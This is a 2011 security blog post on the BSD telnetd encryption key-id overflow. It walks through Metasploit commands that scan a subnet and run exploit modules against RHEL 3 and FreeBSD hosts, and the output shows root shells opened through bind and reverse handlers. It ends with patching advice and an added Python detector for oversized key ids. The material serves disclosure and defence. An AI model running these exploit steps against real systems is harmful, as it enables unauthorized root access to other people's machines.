More Fun with BSD-derived Telnet Daemons

Blog Post created by hdmoore on Dec 28, 2011

In my last post, I discussed the recent BSD telnetd vulnerability and demonstrated the scanner module added to the Metasploit Framework. Since then, two new exploit modules have been released: one for FreeBSD versions 5.3 - 8.2 and another for Red Hat Enterprise Linux 3.

Starting with an updated copy of the Metasploit Framework, load the console and kick off the scanner:

$ msfconsole

msf> use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24
msf auxiliary(telnet_encrypt_overflow) > set THREADS 64
msf auxiliary(telnet_encrypt_overflow) > run
[+] 192.168.0.169:23 VULNERABLE: localhost.localdomain (Linux release 2.4.21-4.EL #1 ...
[+] 192.168.0.130:23 VULNERABLE: FreeBSD/i386 (freebsd.localdomain) (pts/0)\x0d\x0a\x0d\x0alogin:
[*] Auxiliary module execution completed

For the first target (Linux), we will choose the RHEL 3 exploit:

msf> use exploit/linux/telnet/telnet_encrypt_keyid
msf exploit(telnet_encrypt_keyid) > set RHOST 192.168.0.169
msf exploit(telnet_encrypt_keyid) > exploit
[*] Started bind handler
[*] Brute forcing with 1 possible targets
[*] Trying target Red Hat Enterprise Linux 3 (krb5-telnet)...
[*] Sending first payload
[*] Sending second payload...
[*] Sending stage (36 bytes) to 192.168.0.169
[*] Command shell session 1 opened

id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N] y

[*] Command shell session 1 closed.  Reason: User exit

Easy enough, now on to our FreeBSD target:

msf> use exploit/freebsd/telnet/telnet_encrypt_keyid
msf exploit(telnet_encrypt_keyid) > set RHOST 192.168.0.130
msf exploit(telnet_encrypt_keyid) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Brute forcing with 9 possible targets
[*] Trying target FreeBSD 8.2...
[*] Sending first payload
[*] Sending second payload...
[*] Command shell session 2 opened

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

That about sums it up. If for some crazy reason you are running telnet on your BSD systems, or have the bad luck to be using a BSD-derived telnet daemon on Linux (such as krb5-telnet), patch or upgrade to SSH as soon as possible. If you would like to contribute a new exploit target for either Linux or Windows, all we typically need is the output of the following command:

$ msfelfscan -j edx /path/to/telnetd

(msfelfscan is part of the Metasploit Framework)

The exploit is ridiculously simple, and only a single jmp target is needed to add reliable targeting for a new platform. Supporting BSD variants such as DragonFly, NetBSD, and so on is likely to require no more effort than a new jmp target (assuming no major compiler changes).

Dan Rosenberg confirmed that BSD-derived telnet CLIENTS are vulnerable as well, but we have not added any exploits for the client side at this time. Thanks again to Brandon Perry for getting the ball rolling on the exploit code and testing against multiple targets.
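Since both the daemon and the client side are affected, a passive check over captured telnet traffic is a useful complement to the scanner above. The following is an added example, not code from the original post or from the Metasploit modules: it decodes telnet suboption negotiation and flags any ENCRYPT key-id suboption larger than the 64-byte buffer the BSD-derived encrypt code copies it into. The option codes come from RFC 2946 and the 64-byte limit (MAXKEYLEN) from that code; the sample byte stream is constructed for the demonstration.

```python
# Added example (not from the original post): passive detector for oversized
# telnet ENCRYPT key ids in a raw telnet byte stream (either direction).
IAC, SB, SE = 255, 250, 240
TELOPT_ENCRYPT = 38          # RFC 2946 Telnet Data Encryption Option
ENC_KEYID, DEC_KEYID = 7, 8  # RFC 2946 sub-option commands carrying a key id
MAXKEYLEN = 64               # key-id buffer size in the BSD-derived encrypt code

def iter_suboptions(stream: bytes):
    """Yield (offset, payload) for each IAC SB ... IAC SE block, unescaping IAC IAC."""
    i, n = 0, len(stream)
    while i < n - 1:
        if stream[i] == IAC and stream[i + 1] == SB:
            start, i, payload = i, i + 2, bytearray()
            while i < n:
                if stream[i] == IAC:
                    if i + 1 < n and stream[i + 1] == IAC:   # escaped 0xff data byte
                        payload.append(IAC); i += 2; continue
                    if i + 1 < n and stream[i + 1] == SE:    # end of suboption
                        i += 2; break
                    break                                    # malformed: stop this block
                payload.append(stream[i]); i += 1
            yield start, bytes(payload)
        else:
            i += 1

def find_oversized_keyids(stream: bytes, limit: int = MAXKEYLEN):
    """Return (offset, key_id_length) for ENCRYPT key-id suboptions longer than limit."""
    hits = []
    for off, sub in iter_suboptions(stream):
        if len(sub) >= 2 and sub[0] == TELOPT_ENCRYPT and sub[1] in (ENC_KEYID, DEC_KEYID):
            keyid = sub[2:]
            if len(keyid) > limit:
                hits.append((off, len(keyid)))
    return hits

# Constructed sample: IAC WILL ECHO, a legitimate 4-byte key id, then a 100-byte key id.
SAMPLE = (bytes([IAC, 251, 1])
          + bytes([IAC, SB, TELOPT_ENCRYPT, ENC_KEYID]) + b"\x00\x01\x02\x03" + bytes([IAC, SE])
          + bytes([IAC, SB, TELOPT_ENCRYPT, ENC_KEYID]) + b"A" * 100 + bytes([IAC, SE]))

if __name__ == "__main__":
    for off, length in find_oversized_keyids(SAMPLE):
        print(f"oversized ENCRYPT key id ({length} bytes) at offset {off}")  # (13, 100)
```

Escaped IAC bytes inside the key id are counted once, so the length compared against the limit is the length the daemon would actually copy.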

-HD